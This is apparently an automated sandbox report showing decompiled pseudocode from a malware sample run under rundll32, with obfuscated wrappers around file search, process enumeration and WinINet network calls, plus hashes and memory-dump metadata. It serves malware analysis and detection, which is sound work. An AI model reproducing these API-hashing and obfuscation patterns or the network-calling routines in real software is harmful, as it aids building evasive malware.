			E002E75F0(WCHAR* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, struct _WIN32_FIND_DATAW* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t45;
				void* _t55;
				signed int _t57;
				void* _t61;
				WCHAR* _t62;

				_push(_a16);
				_t62 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002DE171(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xb912f;
				_v16 = 0x3c5b;
				_v16 = _v16 << 8;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x0f16cb47;
				_v12 = 0x201d;
				_t57 = 0x67;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0x1525;
				_v12 = _v12 ^ 0x000060c4;
				_v20 = 0x5621;
				_push(0xe646c375);
				_push(_t57);
				_push(_t57);
				_push(0xb6b01ae5);
				_v20 = _v20 * 0x11;
				_v20 = _v20 ^ 0x0005ad04;
				_v8 = 0x7e99;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0xf63dec19;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x7bdfa048;
				_t61 = 0x2f;
				E002D606F(_t61);
				_t55 = FindFirstFileW(_t62, _a16); // executed
				return _t55;
			}

0x002e75f7
0x002e75fa
0x002e75fc
0x002e75ff
0x002e7602
0x002e7606
0x002e7607
0x002e760c
0x002e7612
0x002e7619
0x002e7620
0x002e7624
0x002e7628
0x002e762f
0x002e763b
0x002e7641
0x002e7644
0x002e764b
0x002e7652
0x002e765d
0x002e7662
0x002e7663
0x002e7664
0x002e7669
0x002e766c
0x002e7673
0x002e767a
0x002e767e
0x002e7685
0x002e7689
0x002e769e
0x002e769f
0x002e76ab
0x002e76b1

APIs

FindFirstFileW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,002DCFCB,00000006), ref: 002E76AB

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1b33e713a3789f05197475a3a721a29c892895f030733b75049e37504ccbace2
Instruction ID: f3207d3f997065ba1d5653815db85201e2578260428d8a891460cb6e48a4e8e6
Opcode Fuzzy Hash: 1b33e713a3789f05197475a3a721a29c892895f030733b75049e37504ccbace2
Instruction Fuzzy Hash: 03213676D00209EBDF04DFE4D90A8DEBBB4FB04314F108098E92567241D3B95B68DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002E280B, Relevance: 1.6, APIs: 1, Instructions: 53
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E002E280B(void* __ecx, DWORD* _a4, void* _a8, void* _a12, intOrPtr _a16, long _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t47;
				int _t56;
				void* _t59;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002DE171(_t47);
				_v12 = 0xf4aa;
				_v12 = _v12 << 0xb;
				_v12 = _v12 + 0xffff0235;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x52357f4d;
				_v20 = 0xc888;
				_v20 = _v20 << 5;
				_push(0x913736e2);
				_push(0x262cac91);
				_v20 = _v20 * 0x64;
				_v20 = _v20 ^ 0x09ca8e36;
				_v16 = 0xc055;
				_v16 = _v16 + 0xffffe255;
				_t59 = 0x6e;
				_v16 = _v16 * 0x2b;
				_v16 = _v16 ^ 0x001b655f;
				_v8 = 0x45b3;
				_v8 = _v8 ^ 0x438f2147;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00006aee;
				E002D606F(_t59);
				_t56 = InternetReadFile(_a12, _a8, _a20, _a4); // executed
				return _t56;
			}

0x002e2811
0x002e2814
0x002e2817
0x002e281a
0x002e281d
0x002e2820
0x002e2825
0x002e282a
0x002e2834
0x002e2838
0x002e283f
0x002e2843
0x002e284a
0x002e2851
0x002e2859
0x002e2860
0x002e2865
0x002e2868
0x002e286f
0x002e2876
0x002e2883
0x002e2884
0x002e2887
0x002e288e
0x002e2895
0x002e289c
0x002e28a0
0x002e28a4
0x002e28b7
0x002e28cb
0x002e28d0

APIs

InternetReadFile.WININET(09CA8E36,001B655F,?,52357F4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002E28CB

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 719739c2baf08ce162dc0a300e926572c2d6b88cf73f502fd3579b889a3d351c
Instruction ID: 4b626cd7929f77a7bc75db431a86fedac525f2b3c11ce152eab9d5d3a1c5a6d8
Opcode Fuzzy Hash: 719739c2baf08ce162dc0a300e926572c2d6b88cf73f502fd3579b889a3d351c
Instruction Fuzzy Hash: 6A21D376D0020DEBDF05DFA4C94A8DEBBB2FB14344F108588E924A6261D3B68B65DF80

Uniqueness

Uniqueness Score: -1.00%

Function 002E6686, Relevance: 1.5, APIs: 1, Instructions: 43
processCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E002E6686(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				signed int _t47;

				_v12 = 0x956d;
				_v12 = _v12 << 1;
				_v12 = _v12 + 0xffffe523;
				_v12 = _v12 + 0xf07d;
				_v12 = _v12 ^ 0x00021718;
				_v20 = 0x58ee;
				_v20 = _v20 + 0xf0b1;
				_v20 = _v20 ^ 0x00010871;
				_v16 = 0x7011;
				_t47 = 0x7f;
				_push(_t47);
				_v16 = _v16 * 0x67;
				_v16 = _v16 ^ 0x002d3802;
				_v8 = 0x9843;
				_v8 = _v8 / _t47;
				_v8 = _v8 + 0xffff73cd;
				_v8 = _v8 + 0x606a;
				_v8 = _v8 ^ 0xffffe904;
				E002D606F(0x14a, 0xb6b01ae5, _t47, _t47, 0xdaa7d229);
				_t46 = CreateToolhelp32Snapshot(_a12, 0); // executed
				return _t46;
			}

0x002e668c
0x002e6695
0x002e6698
0x002e669f
0x002e66a6
0x002e66ad
0x002e66b4
0x002e66bb
0x002e66c2
0x002e66cf
0x002e66d0
0x002e66d6
0x002e66d9
0x002e66e0
0x002e66ed
0x002e66f5
0x002e66fc
0x002e6703
0x002e671c
0x002e6729
0x002e672e

APIs

CreateToolhelp32Snapshot.KERNEL32(00010871,00000000), ref: 002E6729

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: d4fd6f8f33df3e60c4e5d43233582dd6e75459a17c5821c0407e611d9beb3219
Instruction ID: 50fb62c829b446a0f896a898ce0c5635f43b9e44a45b9f573b95fc121a70a9f0
Opcode Fuzzy Hash: d4fd6f8f33df3e60c4e5d43233582dd6e75459a17c5821c0407e611d9beb3219
Instruction Fuzzy Hash: 5C1133B1D00309EBDB44CFE8C84A9AEBBB4FB00304F208199E425A7291E7B86B149F40

Uniqueness

Uniqueness Score: -1.00%

Function 002D10D6, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E002D10D6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, void* _a16, char _a24, intOrPtr _a28, void* _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t52;
				int _t61;
				signed int _t63;

				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002DE171(_t52);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x7806e3;
				_v32 = 0x575fe1;
				_v12 = 0x356e;
				_v12 = _v12 ^ 0xd5127aca;
				_t63 = 0x54;
				_v12 = _v12 / _t63;
				_v12 = _v12 ^ 0x028967f2;
				_v8 = 0x61a4;
				_v8 = _v8 << 0xb;
				_v8 = _v8 | 0x6ed09147;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x01bf056a;
				_v20 = 0x8bf1;
				_v20 = _v20 + 0x566b;
				_v20 = _v20 ^ 0x0000ff9c;
				_v16 = 0x530;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x00006b56;
				E002D606F(0x15c, 0x262cac91, _t63, _t63, 0xb55c409);
				_t50 =  &_a24; // 0x575fe1
				_t61 = HttpSendRequestW(_a32,  *_t50, 0xffffffff, _a16, _a12); // executed
				return _t61;
			}

0x002d10dc
0x002d10df
0x002d10e2
0x002d10e5
0x002d10e7
0x002d10ea
0x002d10ed
0x002d10f0
0x002d10f5
0x002d10fa
0x002d1100
0x002d1104
0x002d110b
0x002d1112
0x002d1119
0x002d1125
0x002d1130
0x002d1133
0x002d113a
0x002d1141
0x002d1145
0x002d114c
0x002d1150
0x002d1157
0x002d115e
0x002d1165
0x002d116c
0x002d1173
0x002d1177
0x002d1196
0x002d11a6
0x002d11ac
0x002d11b1

APIs

HttpSendRequestW.WININET(?,_W,000000FF,00000000,0000FF9C), ref: 002D11AC

Strings

Vk, xrefs: 002D1177
_W, xrefs: 002D11A6
n5, xrefs: 002D1112
_W, xrefs: 002D110B
kV, xrefs: 002D115E

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Vk$kV$n5$_W$_W
API String ID: 360639707-3188295959
Opcode ID: c3337840ed23783d657cbeccdd43dbb9a175208f5e060c588b0a1539be38f0e0
Instruction ID: 35661d10017fff028f618331d2d9f3948503642aa4cdd43f776e0688d00d6623
Opcode Fuzzy Hash: c3337840ed23783d657cbeccdd43dbb9a175208f5e060c588b0a1539be38f0e0
Instruction Fuzzy Hash: 2A21E975900209FBDF05DFD4CD4A9DEBBB1FB08315F108298F924662A0D3BA9A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002E353E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E002E353E(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t41;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;
				void* _t59;

				_t59 = __ecx;
				E002DE171(_t41);
				_v36 = 0x4e8f97;
				asm("stosd");
				_t54 = 0x70;
				asm("stosd");
				asm("stosd");
				_v8 = 0x494c;
				_v8 = _v8 * 0x34;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0000d004;
				_v20 = 0x2d67;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x0002f1f8;
				_v16 = 0xc02d;
				_t26 = _t54 + 0x1a; // 0x8a
				_v16 = _v16 / _t54;
				_v16 = _v16 ^ 0x00007993;
				_v12 = 0xb5ab;
				_v12 = _v12 | 0xea6d5014;
				_v12 = _v12 ^ 0xea6dfaed;
				_t51 = E002D606F(_t26, 0xb6b01ae5, _t54, _t54, 0xc3945458);
				_t52 =  *_t51(_a8, 0, _t59, _a16, __ecx, 0, _a4, _a8, _a12, _a16, _a20); // executed
				return _t52;
			}

0x002e3549
0x002e355a
0x002e355f
0x002e356d
0x002e3570
0x002e3574
0x002e357a
0x002e357b
0x002e358d
0x002e3590
0x002e3594
0x002e359b
0x002e35a2
0x002e35a6
0x002e35ad
0x002e35b9
0x002e35bc
0x002e35bf
0x002e35c6
0x002e35cd
0x002e35d4
0x002e35e7
0x002e35f8
0x002e35ff

APIs

QueryFullProcessImageNameW.KERNEL32(00007993,00000000,A6D32CF7,EE941BD0,?,?,?,?,?,?,?,?,002D37AA,00000000,00000000), ref: 002E35F8

Strings

LI, xrefs: 002E357B
g-, xrefs: 002E359B

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID: LI$g-
API String ID: 3578328331-3977910987
Opcode ID: 6ce1ba3b3bf6b0444107e30f7efa050fa6e4697579d1584f3844a1930061ff6b
Instruction ID: c06e8f1dc3d0819c2a02310d09f54182e15ca6c14b33d1ce00840831bd33691c
Opcode Fuzzy Hash: 6ce1ba3b3bf6b0444107e30f7efa050fa6e4697579d1584f3844a1930061ff6b
Instruction Fuzzy Hash: 77211A75D00208FBEF05DFD4C84AADEBBB1FF44314F108199E9256A250C7B59A14DB91

Uniqueness

Uniqueness Score: -1.00%

Function 002E8409, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 80
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E002E8409(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a40, long _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t57;
				void* _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				long _t86;

				_push(_a48);
				_t86 = __edx;
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002DE171(_t57);
				_v28 = 0x3438bc;
				_v24 = 0;
				_v12 = 0xcb52;
				_t74 = 0xd;
				_v12 = _v12 * 0x44;
				_v12 = _v12 * 0x51;
				_v12 = _v12 ^ 0x1116e99e;
				_v20 = 0x8d1c;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x00234fd5;
				_v8 = 0x5991;
				_t75 = 0x12;
				_v8 = _v8 / _t74;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x00000693;
				_v16 = 0xdaea;
				_t76 = 0x6e;
				_v16 = _v16 / _t76;
				_v16 = _v16 ^ 0x00006144;
				E002D606F(0x128, 0xb6b01ae5, _t76, _t76, 0xd3c406ee);
				_t72 = CreateFileW(_a40, _a44, _a32, 0, _a8, _t86, 0); // executed
				return _t72;
			}

0x002e8411
0x002e8416
0x002e8418
0x002e841b
0x002e841e
0x002e841f
0x002e8422
0x002e8425
0x002e8428
0x002e842b
0x002e842c
0x002e842f
0x002e8432
0x002e8435
0x002e8437
0x002e843c
0x002e8445
0x002e8448
0x002e8455
0x002e8458
0x002e845f
0x002e8462
0x002e8469
0x002e8470
0x002e8474
0x002e847b
0x002e8487
0x002e8488
0x002e8494
0x002e8499
0x002e84a0
0x002e84aa
0x002e84b5
0x002e84b8
0x002e84d7
0x002e84ee
0x002e84f5

APIs

CreateFileW.KERNEL32(?,?,?,00000000,00006144, <style class="Panel.SyncDevice.Details" verticalTextAlignment="center" enableAlphaEllipses="true" height="56"> <style class="Panel.SyncDevice.Details.Title" fontStyle="FS8" top="85" left="200" height="44" width="605" VerticalTextAlignment=,00000000), ref: 002E84EE

Strings

<style class="Panel.SyncDevice.Details" verticalTextAlignment="center" enableAlphaEllipses="true" height="56"> <style class="Panel.SyncDevice.Details.Title" fontStyle="FS8" top="85" left="200" height="44" width="605" VerticalTextAlignment=, xrefs: 002E8435, 002E84E0

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: <style class="Panel.SyncDevice.Details" verticalTextAlignment="center" enableAlphaEllipses="true" height="56"> <style class="Panel.SyncDevice.Details.Title" fontStyle="FS8" top="85" left="200" height="44" width="605" VerticalTextAlignment=
API String ID: 823142352-4270370228
Opcode ID: 637634e9ca5f09ecfbf418dafc5c0319d1bfc3b194cb6f0e9aca650dbc649f10
Instruction ID: 9c74a28671581e8805026d4ca264eb2eadb6bca73929f93dba7f87a33aaeaebb
Opcode Fuzzy Hash: 637634e9ca5f09ecfbf418dafc5c0319d1bfc3b194cb6f0e9aca650dbc649f10
Instruction Fuzzy Hash: B1310672A01208FBDF05DF95CD098DEBFB6FF88304F108199F914AA250D7B69A20DB90

Uniqueness

Uniqueness Score: -1.00%

Function 002EC87B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70
networkCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E002EC87B(long __ecx, void* __edx, intOrPtr _a4, unsigned int _a8, intOrPtr _a12, WCHAR* _a28, intOrPtr _a32, intOrPtr _a40, intOrPtr _a44) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				void* _t48;
				void* _t49;
				signed int _t51;
				void* _t55;
				long _t56;
				short _t57;

				_push(_a44);
				_t57 = _a8;
				_push(_a40);
				_t49 = __edx;
				_push(0);
				_push(_a32);
				_t56 = __ecx;
				_push(_a28);
				_push(0);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_t57 & 0x0000ffff);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002DE171(_t57 & 0x0000ffff);
				_v4 = 0x64d2;
				_v4 = _v4 ^ 0x15b6a29a;
				_v4 = _v4 ^ 0x15b6eb53;
				_a8 = 0x1ed3;
				_a8 = _a8 ^ 0x28e836b1;
				_a8 = _a8 >> 0xb;
				_a8 = _a8 ^ 0x00050213;
				_v8 = 0x449c;
				_t51 = 0x12;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x00002d4c;
				_v12 = 0xf059;
				_v12 = _v12 + 0xa304;
				_v12 = _v12 ^ 0x0001d4a0;
				_push(0x5bbeaddf);
				_push(_t51);
				_push(_t51);
				_push(0x262cac91);
				_t55 = 0x38;
				E002D606F(_t55);
				_t48 = InternetConnectW(_t49, _a28, _t57, 0, 0, _t56, 0, 0); // executed
				return _t48;
			}

0x002ec882
0x002ec886
0x002ec88c
0x002ec893
0x002ec895
0x002ec896
0x002ec89a
0x002ec89c
0x002ec8a0
0x002ec8a1
0x002ec8a2
0x002ec8a3
0x002ec8a7
0x002ec8a8
0x002ec8ac
0x002ec8ad
0x002ec8ae
0x002ec8b3
0x002ec8bd
0x002ec8c5
0x002ec8cd
0x002ec8d5
0x002ec8dd
0x002ec8e2
0x002ec8ea
0x002ec8f8
0x002ec8fe
0x002ec902
0x002ec90a
0x002ec912
0x002ec91a
0x002ec932
0x002ec937
0x002ec938
0x002ec939
0x002ec940
0x002ec941
0x002ec954
0x002ec95d

APIs

InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 002EC954

Strings

L-, xrefs: 002EC902

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: L-
API String ID: 3050416762-1489653379
Opcode ID: 8ae0fa518b2dcdbf9abfc84fc44d0e9f0e4c60dc421aa98f0f97c7b1fdcd7d88
Instruction ID: 1ae78770254060cecf814028bf9115e2732ee704938e6b2d07ac525b1609fd5f
Opcode Fuzzy Hash: 8ae0fa518b2dcdbf9abfc84fc44d0e9f0e4c60dc421aa98f0f97c7b1fdcd7d88
Instruction Fuzzy Hash: E6210771508344AFD314DE56D88A85BBFF9EBC6798F05480DF68046221C2B699589BA3

Uniqueness

Uniqueness Score: -1.00%

Function 002E29A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 002E2A76

Strings

-:, xrefs: 002E29C4

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -:
API String ID: 1514166925-3625610842
Opcode ID: 63292dc5826d909282fa17df044cb9d07bc3ca0f96fa15fca28b467bc2bd30c7
Instruction ID: ce160430ca92fca57267a1fd80a2fa7457b2ad419adf565b7b237ced70fc1a3f
Opcode Fuzzy Hash: 63292dc5826d909282fa17df044cb9d07bc3ca0f96fa15fca28b467bc2bd30c7
Instruction Fuzzy Hash: 412123B2D01219BBDF15EFD5C84A8DEBBB5FF04758F108089E92866250D3B94B64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002DE233, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E002DE233(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				int _t56;
				signed int _t58;
				void* _t63;

				_push(_a8);
				_t63 = __ecx;
				_push(_a4);
				_push(__ecx);
				E002DE171(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0x207824;
				_v32 = 0x5ca825;
				_v28 = 0x41d94a;
				_v20 = 0x7881;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x00006f07;
				_v16 = 0x4857;
				_v16 = _v16 | 0x089d9eca;
				_v16 = _v16 ^ 0x89ccdfa9;
				_v16 = _v16 ^ 0x81517cb4;
				_v12 = 0x9d63;
				_v12 = _v12 ^ 0x8284fed9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x08c74906;
				_v8 = 0x78a4;
				_t58 = 0x37;
				_v8 = _v8 * 0x21;
				_v8 = _v8 + 0xffff5146;
				_v8 = _v8 / _t58;
				_t38 = _t58 + 0x60; // 0x97
				_v8 = _v8 ^ 0x0000760a;
				E002D606F(_t38, 0xb6b01ae5, _t58, _t58, 0xd35b4d07);
				_t56 = Process32NextW(_t63, _a4); // executed
				return _t56;
			}

0x002de23a
0x002de23d
0x002de23f
0x002de243
0x002de244
0x002de249
0x002de24f
0x002de256
0x002de25d
0x002de264
0x002de26b
0x002de26f
0x002de276
0x002de27d
0x002de284
0x002de28b
0x002de292
0x002de299
0x002de2a0
0x002de2a4
0x002de2ab
0x002de2b8
0x002de2bc
0x002de2bf
0x002de2d0
0x002de2d3
0x002de2d6
0x002de2f0
0x002de2fc
0x002de302

APIs

Process32NextW.KERNEL32(?,08C74906,?,?,?,?,?,?,?,?), ref: 002DE2FC

Strings

$x , xrefs: 002DE24F

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: NextProcess32
String ID: $x
API String ID: 1850201408-479061016
Opcode ID: 879bc28ffba1e06be2e95c49ff05cec377e80531e50606502707ba9fffa517b0
Instruction ID: c2f12eb9256b74adcf308020a87ecdf5cce6601ae8e595ba2cf95c467baf5a17
Opcode Fuzzy Hash: 879bc28ffba1e06be2e95c49ff05cec377e80531e50606502707ba9fffa517b0
Instruction Fuzzy Hash: 472104B0D00208EFDB08DFE5D94A8EEBBB4EB04308F10C199E4156A251D7B96B55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002D30A4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E002D30A4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t51;
				signed int _t53;
				signed int _t54;
				void* _t61;

				_push(_a12);
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002DE171(_t40);
				_v20 = 0x20f1;
				_v20 = _v20 | 0xe56d7bd2;
				_v20 = _v20 ^ 0xe56d3b5f;
				_v16 = 0x60a3;
				_v16 = _v16 | 0xd94b0631;
				_v16 = _v16 ^ 0xd94b4fc4;
				_v8 = 0x959e;
				_t53 = 0x46;
				_v8 = _v8 / _t53;
				_v8 = _v8 + 0xffff8b5f;
				_t54 = 0x4f;
				_v8 = _v8 / _t54;
				_v8 = _v8 ^ 0x033dd111;
				_v12 = 0xe903;
				_v12 = _v12 + 0xffff1267;
				_v12 = _v12 ^ 0xffffff7c;
				E002D606F(0x14b, 0xbee648b, _t54, _t54, 0x43269794);
				_t51 = CloseServiceHandle(_t61); // executed
				return _t51;
			}

0x002d30ab
0x002d30ae
0x002d30b0
0x002d30b3
0x002d30b7
0x002d30b8
0x002d30bd
0x002d30c6
0x002d30cd
0x002d30d4
0x002d30db
0x002d30e2
0x002d30e9
0x002d30f5
0x002d30fa
0x002d30ff
0x002d3109
0x002d3114
0x002d3117
0x002d311e
0x002d3125
0x002d312c
0x002d314b
0x002d3154
0x002d315a

APIs

CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 002D3154

Strings

_;m, xrefs: 002D313C

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: _;m
API String ID: 1725840886-664033043
Opcode ID: d75a0fcb5f25f2b99316df039cec5ce09b853bf13e00b914fbefc6796831680a
Instruction ID: d681ff343fc040f419f03c91661f2c0225c4c5d8adf63359640384e7dbd99c42
Opcode Fuzzy Hash: d75a0fcb5f25f2b99316df039cec5ce09b853bf13e00b914fbefc6796831680a
Instruction Fuzzy Hash: 77112B76E00218FFEB04DFE8CC468DEBB71EB44310F108599E524AB292D7B55F119B91

Uniqueness

Uniqueness Score: -1.00%

Function 002E1E15, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 002E1EC6

Strings

)@1, xrefs: 002E1E87

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: )@1
API String ID: 1721193555-1769663298
Opcode ID: 28eb5814bbea609a12cb80a4985591a03b47f6da1d5e033d840ed02f22b0dc2d
Instruction ID: fb1a69217c4bfe99e7abf41d8527dc8697b06840bfb8251a15b1151db425af6a
Opcode Fuzzy Hash: 28eb5814bbea609a12cb80a4985591a03b47f6da1d5e033d840ed02f22b0dc2d
